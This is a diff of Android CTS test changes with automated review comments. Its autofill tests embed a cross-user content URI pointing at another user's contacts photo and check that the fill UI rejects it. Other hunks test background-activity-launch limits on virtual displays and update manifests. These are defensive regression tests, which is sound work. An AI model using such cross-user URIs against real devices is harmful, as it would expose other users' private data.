@@ -977,6 +981,51 @@
assertThat(v.isCredential()).isFalse();
}
+ @Test
+ public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+ enableFillDialogFeature(sContext);
+ enableService();
+
+ RemoteViews header = createPresentation("Dialog Header");
+ RemoteViews dialogRv = createPresentation("Dialog Presentation");
+ // bad url, should not be displayed
+ header.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+ "content://1000@com.android.contacts/display_photo/1"));
+ dialogRv.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+ "content://1000@com.android.contacts/display_photo/1"));
+
+ // Set response with a dataset
+ final CannedFillResponse.Builder builder = new CannedFillResponse.Builder()
+ .addDataset(new CannedDataset.Builder()
+ .setField(ID_USERNAME, "dude")
+ .setField(ID_PASSWORD, "sweet")
+ .setPresentation(createPresentation("Dropdown Presentation"))
+ .setDialogPresentation(dialogRv)
+ .build())
+ .setDialogHeader(header)
+ .setDialogTriggerIds(ID_PASSWORD);
+ sReplier.addResponse(builder.build());
+
+ // Start activity and autofill
+ LoginActivity activity = startLoginActivity();
+ mUiBot.waitForIdleSync();
+
+ sReplier.getNextFillRequest();
+ mUiBot.waitForIdleSync();
+
+ // Click on password field to trigger fill dialog
+ mUiBot.selectByRelativeId(ID_PASSWORD);
+ mUiBot.waitForIdleSync();
+
+ // Asserts that the header is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.findFillDialogHeaderPicker());
+
+ // Asserts that the
+ assertThrows(RetryableException.class,
+ () -> mUiBot.findFillDialogDatasetPicker());
+ }
+
private FieldsNoPasswordActivity startNoPasswordActivity() throws Exception {
final Intent intent = new Intent(mContext, FieldsNoPasswordActivity.class)
.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
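Review bot: Both checks in `remoteViews_doesNotSpillAcrossUsers` are negative (`assertThrows(RetryableException.class, ...)`), so the test also passes if the fill dialog never appears for an unrelated reason, such as the feature being disabled or the trigger click missing the field. A positive control would separate "blocked because of the cross-user icon URI" from "nothing was shown at all"; one option is the same response without the `content://1000@...` icon, asserted to show. The second comment is truncated (`// Asserts that the`) and should read `// Asserts that the dataset picker is not shown`. The local `activity` is assigned but never used. The URI literal is repeated and would read better as a named constant with a comment that the `1000@` user prefix is what must be rejected.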
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
index 96ebd3f..15fc1ed 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
@@ -75,6 +75,8 @@
import static com.google.common.truth.Truth.assertThat;
import static com.google.common.truth.Truth.assertWithMessage;
+import static org.junit.Assert.assertThrows;
+
import android.app.PendingIntent;
import android.app.assist.AssistStructure.ViewNode;
import android.autofillservice.cts.R;
@@ -104,6 +106,7 @@
import android.content.IntentSender;
import android.graphics.Color;
import android.graphics.Rect;
+import android.graphics.drawable.Icon;
import android.os.Bundle;
import android.os.SystemClock;
import android.platform.test.annotations.AppModeFull;
@@ -1468,6 +1471,46 @@
mActivity.assertAutoFilled();
}
+ @Test
+ public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+ // Set service.
+ enableService();
+
+
+ RemoteViews firstRv = createPresentation("hello");
+ RemoteViews secondRv = createPresentation("world");
+
+ // bad url, should not be displayed
+ firstRv.setImageViewIcon(R.id.icon,
+ Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+ secondRv.setImageViewIcon(R.id.icon,
+ Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+
+ // Set expectations.
+ sReplier.addResponse(new CannedFillResponse.Builder()
+ .addDataset(new CannedDataset.Builder()
+ .setField(ID_USERNAME, "dude", firstRv)
+ .setField(ID_PASSWORD, "sweet", secondRv)
+ .build())
+ .setHeader(firstRv)
+ .setFooter(secondRv)
+ .build());
+
+ mActivity.expectAutoFill("dude", "sweet");
+
+ // Trigger auto-fill.
+ mActivity.onUsername(View::requestFocus);
+ sReplier.getNextFillRequest();
+
+ // Assert that the dataset is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.assertDatasets("The Dude"));
+
+ // Assert that header/footer is not shown
+ assertThrows(RetryableException.class,
+ () -> mUiBot.assertDatasetsWithBorders("hello", "world", "The Dude"));
+ }
+
/**
* Tests the scenario where the service uses custom remote views for different fields (username
* and password), but each dataset has a different number of fields.
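Review bot: The "not shown" assertions in `remoteViews_doesNotSpillAcrossUsers` look for `"The Dude"`, but no presentation in this test carries that text; the dataset and the header/footer are built from `createPresentation("hello")` and `createPresentation("world")`. If `assertDatasets` matches on the displayed text, as its use here suggests, both `assertThrows` calls succeed whether or not the cross-user icon URI is blocked, so the test would not catch a regression. Asserting on the strings that are actually set, e.g. `() -> mUiBot.assertDatasets("hello")`, would tie the check to this response. `mActivity.expectAutoFill("dude", "sweet")` is also set up without a matching verification in the hunk and can be dropped if no autofill is expected.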
diff --git a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
index fb7ac1c..e10c9c2 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
@@ -1477,11 +1477,11 @@
return waitForObject(FILL_DIALOG_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
- private UiObject2 findFillDialogDatasetPicker() throws Exception {
+ public UiObject2 findFillDialogDatasetPicker() throws Exception {
return waitForObject(FILL_DIALOG_DATASET_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
- private UiObject2 findFillDialogHeaderPicker() throws Exception {
+ public UiObject2 findFillDialogHeaderPicker() throws Exception {
return waitForObject(FILL_DIALOG_HEADER_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
}
diff --git a/tests/backup/AndroidManifest.xml b/tests/backup/AndroidManifest.xml
index cf8d2e0..71a0925 100644
--- a/tests/backup/AndroidManifest.xml
+++ b/tests/backup/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.backup.cts"
android:label="CTS tests of Android Backup/Restore">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/camera/AndroidManifest.xml b/tests/camera/AndroidManifest.xml
index 9e460ae..8fa1087 100644
--- a/tests/camera/AndroidManifest.xml
+++ b/tests/camera/AndroidManifest.xml
@@ -130,6 +130,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.camera.cts"
android:label="CTS tests of android camera">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
index 2545ad2..4fe8168 100644
--- a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
+++ b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
@@ -33,10 +33,13 @@
import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_DENY;
import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_GRANT;
import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_PROMPT;
+
import static com.android.bedstead.harrier.UserType.WORK_PROFILE;
import static com.android.bedstead.nene.utils.Versions.U;
+
import static com.google.common.truth.Truth.assertThat;
import static com.google.common.truth.Truth.assertWithMessage;
+
import static org.junit.Assume.assumeFalse;
import static org.junit.Assume.assumeTrue;
import static org.testng.Assert.assertThrows;
@@ -45,6 +48,7 @@
import android.app.admin.RemoteDevicePolicyManager;
import android.content.ComponentName;
import android.provider.Settings;
+
import com.android.bedstead.harrier.BedsteadJUnit4;
import com.android.bedstead.harrier.DeviceState;
import com.android.bedstead.harrier.annotations.AfterClass;
@@ -77,8 +81,7 @@
import com.android.bedstead.testapp.TestAppInstance;
import com.android.queryable.annotations.IntegerQuery;
import com.android.queryable.annotations.Query;
-import java.lang.annotation.Retention;
-import java.lang.annotation.RetentionPolicy;
+
import org.junit.Assume;
import org.junit.Before;
import org.junit.ClassRule;
@@ -87,6 +90,9 @@
import org.junit.Test;
import org.junit.runner.RunWith;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+
@RunWith(BedsteadJUnit4.class)
public final class PermissionGrantTest {
diff --git a/tests/framework/base/biometrics/AndroidManifest.xml b/tests/framework/base/biometrics/AndroidManifest.xml
index f79f3d3..67a070d 100644
--- a/tests/framework/base/biometrics/AndroidManifest.xml
+++ b/tests/framework/base/biometrics/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.server.biometrics.cts"
android:label="CTS tests for Biometrics">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/framework/base/locale/AndroidManifest.xml b/tests/framework/base/locale/AndroidManifest.xml
index eeff77a..7fd1ef5 100644
--- a/tests/framework/base/locale/AndroidManifest.xml
+++ b/tests/framework/base/locale/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.localemanager.cts"
android:label="CTS tests for android.localemanager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/framework/base/localeconfig/AndroidManifest.xml b/tests/framework/base/localeconfig/AndroidManifest.xml
index d931a28..6f23b37 100644
--- a/tests/framework/base/localeconfig/AndroidManifest.xml
+++ b/tests/framework/base/localeconfig/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.localeconfig"
android:label="CTS tests for android.app.LocaleConfig">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/framework/base/suggestions/AndroidManifest.xml b/tests/framework/base/suggestions/AndroidManifest.xml
index 8f61c062..85e7f34 100644
--- a/tests/framework/base/suggestions/AndroidManifest.xml
+++ b/tests/framework/base/suggestions/AndroidManifest.xml
@@ -29,6 +29,8 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.service.settings.suggestions.cts"
android:label="CTS tests of android.service.settings.suggestions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
index 22289d8..cf59443 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
@@ -108,6 +108,12 @@
"START_ACTIVITY_FROM_FG_ACTIVITY_DELAY_MS_EXTRA";
}
+ /** Extra key constants for {@link #VIRTUAL_DISPLAY_ACTIVITY} */
+ public static class VirtualDisplayActivityExtra {
+ public final String USE_PUBLIC_PRESENTATION =
+ "USE_PUBLIC_PRESENTATION_EXTRA";
+ }
+
// TODO(b/263368846) rename to camelCase
public final String APP_PACKAGE_NAME;
public final ComponentName BACKGROUND_ACTIVITY;
@@ -138,6 +144,9 @@
public final StartActivityReceiverExtra START_ACTIVITY_RECEIVER_EXTRA =
new StartActivityReceiverExtra();
+ public final VirtualDisplayActivityExtra VIRTUAL_DISPLAY_ACTIVITY_EXTRA =
+ new VirtualDisplayActivityExtra();
+
public Components(String appPackageName) {
APP_PACKAGE_NAME = appPackageName;
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
index 5461305..bb25cac 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
@@ -26,7 +26,23 @@
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
- createVirtualDisplayAndShowPresentation();
+ Components appA = Components.get(getApplicationContext());
+ boolean usePublicPresentation = getIntent().getBooleanExtra(
+ appA.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+ if (usePublicPresentation) {
+ createPublicVirtualDisplayAndShowPresentation();
+ } else {
+ createVirtualDisplayAndShowPresentation();
+ }
+ }
+
+ private void createPublicVirtualDisplayAndShowPresentation() {
+ VirtualDisplay virtualDisplay = getSystemService(DisplayManager.class).createVirtualDisplay(
+ "VirtualDisplay1", 10, 10, 10, null,
+ DisplayManager.VIRTUAL_DISPLAY_FLAG_PUBLIC
+ + DisplayManager.VIRTUAL_DISPLAY_FLAG_PRESENTATION
+ + DisplayManager.VIRTUAL_DISPLAY_FLAG_OWN_CONTENT_ONLY);
+ new Presentation(getBaseContext(), virtualDisplay.getDisplay()).show();
}
private void createVirtualDisplayAndShowPresentation() {
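Review bot: `createPublicVirtualDisplayAndShowPresentation()` dereferences the result of `createVirtualDisplay(...)` with no null check, and that call is documented to return null when the display cannot be created, so a failure shows up as an NPE inside `onCreate` instead of a diagnosable test failure. A guard such as `if (virtualDisplay == null) { finish(); return; }` with a log line would make that case explicit. The flags are also summed with `+`; `DisplayManager.VIRTUAL_DISPLAY_FLAG_PUBLIC | DisplayManager.VIRTUAL_DISPLAY_FLAG_PRESENTATION | DisplayManager.VIRTUAL_DISPLAY_FLAG_OWN_CONTENT_ONLY` is the idiomatic form and stays correct if a flag is ever listed twice. The display is held only in a local and nothing in the hunk releases it.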
diff --git a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
index a01c23d..05293de 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
@@ -751,10 +751,31 @@
// Check that a presentation on a virtual display won't allow BAL after pressing home.
@Test
- public void testVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+ public void testPrivateVirtualDisplayCannotStartAfterHomeButton() throws Exception {
Intent intent = new Intent();
intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+ mContext.startActivity(intent);
+
+ assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
+ APP_A.APP_PACKAGE_NAME, true, ACTIVITY_START_TIMEOUT_MS));
+
+ // Click home button, and test app activity onPause() will trigger which tries to launch
+ // the background activity.
+ pressHomeAndWaitHomeResumed();
+
+ boolean result = waitForActivityFocused(APP_A.BACKGROUND_ACTIVITY);
+ assertFalse("Should not able to launch background activity", result);
+ }
+
+ // Check that a presentation on a virtual display won't allow BAL after pressing home.
+ @Test
+ public void testPublicVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+ Intent intent = new Intent();
+ intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, true);
mContext.startActivity(intent);
assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
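Review bot: Neither test checks that the presentation was actually shown on the virtual display, so if display creation fails in VirtualDisplayActivity the public case can still pass as long as the activity reaches the foreground, and the restriction it is meant to cover goes unverified. Whether the activity reports the presentation back to the test is not visible here; if it does not, a signal the test can assert on would close that gap. The comment above `testPublicVirtualDisplayCannotStartAfterHomeButton` is a verbatim copy of the private one; suggest `// Check that a presentation on a public virtual display won't allow BAL after pressing home.` The two bodies differ only in the boolean extra and could share a private helper taking `usePublicPresentation`. The second test's body continues past the end of this hunk.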
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
index 4513571..b6eea5a 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
@@ -43,7 +43,6 @@
import android.content.Context;
import android.content.Intent;
import android.content.pm.ActivityInfo;
-import android.graphics.Rect;
import android.os.Bundle;
import android.server.wm.MultiDisplayTestBase;
import android.server.wm.ObjectTracker;
@@ -623,18 +622,6 @@
Activity secondaryActivity) throws Exception {
getTransitionLog().clear();
- final int screenwidth = mWm.getDefaultDisplay().getWidth();
- final int screenheight = mWm.getDefaultDisplay().getHeight();
-
- mTaskOrganizer.registerOrganizerIfNeeded();
- Rect primaryTaskBounds = mTaskOrganizer.getPrimaryTaskBounds();
- if (screenheight > screenwidth) {
- primaryTaskBounds.bottom = primaryTaskBounds.width() / 2;
- } else {
- primaryTaskBounds.right = primaryTaskBounds.height() / 2;
- }
- mTaskOrganizer.setRootPrimaryTaskBounds(primaryTaskBounds);
-
mWmState.computeState(secondaryActivity.getComponentName());
moveActivitiesToSplitScreen(primaryActivity.getComponentName(),
secondaryActivity.getComponentName());
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
index eb895ea..f04284c 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
@@ -305,7 +305,7 @@
}
}
- public void setRootPrimaryTaskBounds(Rect bounds) {
+ void setRootPrimaryTaskBounds(Rect bounds) {
setTaskBounds(mRootPrimary.getToken(), bounds);
}
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
index 913b039..b2a8520 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
@@ -379,9 +379,10 @@
}, message);
}
- public void waitForFocusedActivity(final String msg, final ComponentName activityName) {
+ public boolean waitForFocusedActivity(final String msg, final ComponentName activityName) {
final String activityComponentName = getActivityName(activityName);
- waitFor(msg, wmState -> Objects.equals(activityComponentName, wmState.getFocusedActivity())
+ return waitFor(msg, wmState ->
+ Objects.equals(activityComponentName, wmState.getFocusedActivity())
&& Objects.equals(activityComponentName, wmState.getFocusedApp()));
}
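Review bot: The boolean that `waitForFocusedActivity` now returns is undocumented, and existing callers written against the old `void` signature will drop it silently. Add Javadoc along the lines of `/** @return true if both the focused activity and the focused app matched activityName before the wait ended */`; presumably `waitFor` returns false on timeout, but that helper is outside this hunk and should be confirmed. Callers that rely on the wait succeeding should assert on the result rather than ignore it.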
diff --git a/tests/inputmethod/AndroidManifest.xml b/tests/inputmethod/AndroidManifest.xml
index 1687d15..4d83f06 100644
--- a/tests/inputmethod/AndroidManifest.xml
+++ b/tests/inputmethod/AndroidManifest.xml
@@ -74,6 +74,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests of android.view.inputmethod"
android:targetPackage="android.view.inputmethod.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/leanbackjank/AndroidManifest.xml b/tests/leanbackjank/AndroidManifest.xml
index 560b5ca..2b1f1a6 100644
--- a/tests/leanbackjank/AndroidManifest.xml
+++ b/tests/leanbackjank/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.leanbackjank.cts"
android:label="LeanbackJank tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_coarse/AndroidManifest.xml b/tests/location/location_coarse/AndroidManifest.xml
index dc55f8e6..1707b11 100644
--- a/tests/location/location_coarse/AndroidManifest.xml
+++ b/tests/location/location_coarse/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.coarse" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_fine/AndroidManifest.xml b/tests/location/location_fine/AndroidManifest.xml
index ec33245..093c0fa 100644
--- a/tests/location/location_fine/AndroidManifest.xml
+++ b/tests/location/location_fine/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.location.cts.fine"
android:label="CTS tests for android.location">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/location/location_gnss/AndroidManifest.xml b/tests/location/location_gnss/AndroidManifest.xml
index c83b49c..49f1368 100644
--- a/tests/location/location_gnss/AndroidManifest.xml
+++ b/tests/location/location_gnss/AndroidManifest.xml
@@ -39,6 +39,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location that require GNSS signal"
android:targetPackage="android.location.cts.gnss" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_none/AndroidManifest.xml b/tests/location/location_none/AndroidManifest.xml
index 75dfa93..957aeeb 100644
--- a/tests/location/location_none/AndroidManifest.xml
+++ b/tests/location/location_none/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.none" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_privileged/AndroidManifest.xml b/tests/location/location_privileged/AndroidManifest.xml
index c5c71bf..a0200fa 100644
--- a/tests/location/location_privileged/AndroidManifest.xml
+++ b/tests/location/location_privileged/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.privileged" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/media/AndroidManifest.xml b/tests/media/AndroidManifest.xml
index 711f1c3..0a1f5e0 100644
--- a/tests/media/AndroidManifest.xml
+++ b/tests/media/AndroidManifest.xml
@@ -36,6 +36,9 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediav2.cts"
android:label="CTS MediaV2 tests of android.media" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mediapc/AndroidManifest.xml b/tests/mediapc/AndroidManifest.xml
index 5a045d8..bbb1934 100644
--- a/tests/mediapc/AndroidManifest.xml
+++ b/tests/mediapc/AndroidManifest.xml
@@ -37,5 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediapc.cts"
android:label="CTS MediaPerformanceClass tests of android.media" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/AndroidManifest.xml b/tests/mocking/AndroidManifest.xml
index c1736fc..d0f9e00 100644
--- a/tests/mocking/AndroidManifest.xml
+++ b/tests/mocking/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mocking.cts"
android:label="CTS tests for mockito mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/debuggable/AndroidManifest.xml b/tests/mocking/debuggable/AndroidManifest.xml
index cca80f5..3ca5af9 100644
--- a/tests/mocking/debuggable/AndroidManifest.xml
+++ b/tests/mocking/debuggable/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mocking.cts.debuggable"
android:label="CTS tests for mockito mocking (while debuggable)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/extended/AndroidManifest.xml b/tests/mocking/extended/AndroidManifest.xml
index a50e23a..36bd152 100644
--- a/tests/mocking/extended/AndroidManifest.xml
+++ b/tests/mocking/extended/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.extended.mocking.cts"
android:label="CTS tests for mockito extended mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/inline/AndroidManifest.xml b/tests/mocking/inline/AndroidManifest.xml
index b5b2d08..4bb4085 100644
--- a/tests/mocking/inline/AndroidManifest.xml
+++ b/tests/mocking/inline/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.inline.mocking.cts"
android:label="CTS tests for mockito inline mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/ondevicepersonalization/Android.bp b/tests/ondevicepersonalization/Android.bp
new file mode 100644
index 0000000..738effe
--- /dev/null
+++ b/tests/ondevicepersonalization/Android.bp
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+ name: "CtsOnDevicePersonalizationTestCases",
+ defaults: [
+ "cts_defaults",
+ "framework-ondevicepersonalization-cts-defaults",
+ ],
+ // Tag this module as a cts test artifact
+ test_suites: [
+ "cts",
+ "general-tests",
+ "mts-ondevicepersonalization",
+ ],
+ libs: [
+ "android.test.runner",
+ ],
+ static_libs: [
+ "androidx.test.ext.junit",
+ "ctstestrunner-axt",
+ "compatibility-device-util-axt",
+ "mockito-target-minus-junit4",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ platform_apis: false,
+}
diff --git a/tests/ondevicepersonalization/AndroidManifest.xml b/tests/ondevicepersonalization/AndroidManifest.xml
new file mode 100644
index 0000000..8016e92
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.ondevicepersonalization.cts">
+
+ <!-- self-instrumenting test package. -->
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:label="CTS tests for android.ondevicepersonalization"
+ android:targetPackage="android.ondevicepersonalization.cts" >
+ </instrumentation>
+</manifest>
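Review bot: The new `<instrumentation>` element carries no `listener` meta-data, while this same change adds `com.android.cts.runner.CtsTestRunListener` to the instrumentation of the other CTS manifests it touches. The module's Android.bp already links `ctstestrunner-axt`, so unless the omission is deliberate, add `<meta-data android:name="listener" android:value="com.android.cts.runner.CtsTestRunListener" />` inside the element so this module runs with the same listener as the rest.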
diff --git a/tests/ondevicepersonalization/AndroidTest.xml b/tests/ondevicepersonalization/AndroidTest.xml
new file mode 100644
index 0000000..1ca3ae6
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidTest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2022 The Android Open Source Project
+
